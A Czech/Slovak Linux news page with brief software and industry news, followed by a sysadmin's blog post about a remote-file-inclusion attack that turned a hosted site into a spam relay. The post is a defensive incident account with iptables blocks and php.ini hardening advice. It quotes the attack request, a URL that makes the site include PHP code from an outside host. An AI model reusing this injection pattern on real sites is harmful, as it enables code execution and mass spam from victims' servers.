Byla vydána nová major verze 5.0.0 svobodného multiplatformního nástroje BleachBit (GitHub, Wikipedie) určeného především k efektivnímu čištění disku od nepotřebných souborů.
Na čem pracují vývojáři webového prohlížeče Ladybird (GitHub)? Byl publikován přehled vývoje za duben (YouTube).
Provozovatel čínské sociální sítě TikTok dostal v Evropské unii pokutu 530 milionů eur (13,2 miliardy Kč) za nedostatky při ochraně osobních údajů. Ve svém oznámení to dnes uvedla irská Komise pro ochranu údajů (DPC), která jedná jménem EU. Zároveň TikToku nařídila, že pokud správu dat neuvede do šesti měsíců do souladu s požadavky, musí přestat posílat data o unijních uživatelích do Číny. TikTok uvedl, že se proti rozhodnutí odvolá.
Společnost JetBrains uvolnila Mellum, tj. svůj velký jazykový model (LLM) pro vývojáře, jako open source. Mellum podporuje programovací jazyky Java, Kotlin, Python, Go, PHP, C, C++, C#, JavaScript, TypeScript, CSS, HTML, Rust a Ruby.
Vývojáři Kali Linuxu upozorňují na nový klíč pro podepisování balíčků. K původnímu klíči ztratili přístup.
V březnu loňského roku přestal být Redis svobodný. Společnost Redis Labs jej přelicencovala z licence BSD na nesvobodné licence Redis Source Available License (RSALv2) a Server Side Public License (SSPLv1). Hned o pár dní později vznikly svobodné forky Redisu s názvy Valkey a Redict. Dnes bylo oznámeno, že Redis je opět svobodný. S nejnovější verzí 8 je k dispozici také pod licencí AGPLv3.
Oficiální ceny Raspberry Pi Compute Modulů 4 klesly o 5 dolarů (4 GB varianty), respektive o 10 dolarů (8 GB varianty).
Byla vydána beta verze openSUSE Leap 16. Ve výchozím nastavení s novým instalátorem Agama.
Devadesátková hra Brány Skeldalu prošla portací a je dostupná na platformě Steam. Vyšel i parádní blog autora o portaci na moderní systémy a platformy včetně Linuxu.
Lidi dělají divné věci. Například spouští Linux v Excelu. Využít je emulátor RISC-V mini-rv32ima sestavený jako knihovna DLL, která je volaná z makra VBA (Visual Basic for Applications).
Dalsia prihoda, ktora zvyraznuje moj odpor ku SPAMu
Ked sme sli s mojou polovickou domov z prace dostal som SMS v zneni:"Caves, nejaky problem so serverom?nejde ani web ani ftp". Nevedel som o koho ide, kedze sa nepodpisal, tak som mu volal spat. Ukazalo sa, ze je to kamarat X!ch. Prislubil som mu, ze ked sa dostanem domov, tak mu na to pozriem. Predpokladal som, ze ma problem on so sietov. Za 10 minut som dostal druhu SMS od kamarata JOHANIATKA. Napisal:"Ahoj. Vypadok servera ...uz je to viac ako hodinu(Len pre info, ci o tom viete). Majo". Pridali sme do kroku s polovickou. Asi sa nieco deje.
Dosiel som domov...pingat server islo...aj SSH siel. Ale pozeral som, ze vsetka RAMka bola zozrata Postfixom a Apachom. Vo vronte Postfixu bolo 25 000 sprav, ktore boli poslane od uzivatela www-data na nezname/neexistujuce adresy. Tak reku, ze niekto sa bavi. Hladal som ale nic som nenasiel. Ked som restartol Apacha, prestali chodit dalsie maily do fronty. Tak som bol spokojny sam zo sebou. Vymazal som maily z fronty a bol pokoj.
Na dalsi ten som robil nieco na pocitaci. Isiel som si cez webmail pozriet svoju postu a na uvitacej stranke Horde som nasiel spravu od servra, ze ma malo miesta na disku. Prihlasim sa ma masinu vidim, ze je plny disk na ktorom su e-maily z fronty Postfixu. Pozriem do fronty a vo fronte 55 000 nedorucenych mailov. Rozhodol som sa hladat co sa uchylak toto robi. Po asi hodine hladania som dosiel na nasledovne veci:
- Pozrel som si server-status pre Apacheho a nasiel som nasledovnu podozrivu linku: DOMENA/main.php?p=http://www.danfortier.com/en/style.txt?. Kuknem na web a co nevidim? V stranke zakaznika je vlozeny formular zo stranky http://www.danfortier.com/en/style.txt. Ked si pozries tu stranku, je to cisty PHP kod na zasielanie mailov.
- Pozeral som logy a dosiel som na 4 IP adresy odkial to spustali: 196.1.176.194, 88.101.234.10, 82.206.131.126 a 195.225.62.76. Samozrejme dostali DROP do iptables:
iptables --list -v -n -t raw
...
46 2804 DROP all -- eth0 * 196.1.176.194 0.0.0.0/0
0 0 DROP all -- eth0 * 88.101.234.10 0.0.0.0/0
0 0 DROP all -- eth0 * 82.206.131.126 0.0.0.0/0
0 0 DROP all -- eth0 * 195.225.62.76 0.0.0.0/0
...
- Poziadal som vyvojara webu (dost znamu firmu) na opravenie diery vo webe, pretoze to moze dospiet az k vypnutiu ich webu.
Takze mili admini, bacha na derave weby, ktore su mozno aj u vas hostovane. Dostanete sa do black-listov bez svojeho zapricinenia a ani neviete ako a zase budete vy ty najhorsi, pretoze zakaznikovi nejde posielat maily .
Tiskni
Sdílej:
allow_url_fopen = Offa
allow_url_include = Offv php.ini. Všetky aplikácie na hostingu sa celkom dobre auditovať nedajú, a toto zabráni presne takémuto zneužitiu deravej aplikácie. Je síce potom trošku problematickejšie využívanie off-site zdrojov pre programátorov, ale nie je to nič nezvládnuteľné (namiesto jednoduchého include alebo fopen treba použiť knižnicu CURL).
To fakt není nějaká možnost jak to automaticky zahazovat než to zahltí server?Skusit to zahadzovat pred serverom (nejaky stroj na pred-triedovanie posty) - ale neviem ci sa tym vyriesi "zahltenie"...